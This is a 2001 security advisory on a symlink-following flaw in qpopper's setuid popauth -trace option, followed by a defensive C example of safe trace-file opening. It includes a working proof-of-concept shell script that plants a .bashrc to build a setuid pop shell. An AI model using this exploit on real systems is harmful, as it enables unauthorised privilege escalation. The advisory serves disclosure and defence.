popauth symlink problem

18th Dec 2001 [SBWID-4933]

	popauth symlink problem


	 current version of popauth (packaged with qpopper)


	Paul Starzetz reported the following:

	There is a symlink problem in the popauth utility, which is part of the
	qpopper package. The binary is often installed suid pop and follows
	symlinks in the -trace file option. This problem was reported to
	vendors in June 2001.

	Impact: in case of suid popauth and a valid shell for user pop, the
	attached script will create a suid-pop shell if someone su's to pop. This
	may happen as part of some automated check script (startup script).

	This vulnerability is not very crucial; however, it should be reported
	at least once.











	# popauth symlink follow vuln by IhaQueR
	# this will create .bashrc for user pop
	# and ~pop/sup suid shell

	FILE=$(perl -e 'print "/tmp/blah1\"\ncd ~\necho >blah.c \"#include <stdio.h>\nmain(){setreuid(geteuid(),getuid());execlp(\\\"bash\\\", \\\"bash\\\",NULL);}\"\ngcc blah.c -o sup\nchmod u+s sup\necho done\n\n\""')

	ln -s /var/lib/pop/.bashrc "$FILE"

	/usr/sbin/popauth -trace "$FILE"





	Nothing yet.
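
	A defensive sketch of how a setuid helper can open a user-supplied -trace path without the symlink problem described above. This is an added example, not code from the advisory or from qpopper; open_trace_file is a hypothetical name, and a POSIX system that supports O_NOFOLLOW is assumed.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE            /* for O_NOFOLLOW / O_CLOEXEC on strict builds */
#endif
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical helper (not qpopper code): open a caller-named trace file
 * from a setuid program. Returns an fd for appending, or -1 with errno set. */
int open_trace_file(const char *path)
{
    uid_t ruid = getuid(), euid = geteuid();
    struct stat st;
    int fd, saved;

    /* Act as the invoking user while touching the path, so the kernel
     * applies that user's permissions instead of the setuid owner's. */
    if (seteuid(ruid) != 0)
        return -1;

    /* O_NOFOLLOW: refuse a symlink as the final component (ELOOP on Linux).
     * O_NONBLOCK: do not hang if the path names a FIFO. */
    fd = open(path, O_WRONLY | O_APPEND | O_CREAT | O_NOFOLLOW |
                    O_NONBLOCK | O_CLOEXEC, 0600);
    saved = errno;

    if (seteuid(euid) != 0) {          /* could not restore: fail closed */
        if (fd >= 0)
            close(fd);
        return -1;
    }
    if (fd < 0) {
        errno = saved;
        return -1;
    }

    /* Check the object actually opened: regular file, one link, owned by
     * the caller. This rejects hard links, devices and foreign files. */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) ||
        st.st_nlink != 1 || st.st_uid != ruid) {
        close(fd);
        errno = EPERM;
        return -1;
    }
    return fd;
}
```

	O_NOFOLLOW only guards the last path component; symlinks in intermediate directories are still traversed, which is why the open is done under the caller's uid and the result is re-checked with fstat.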
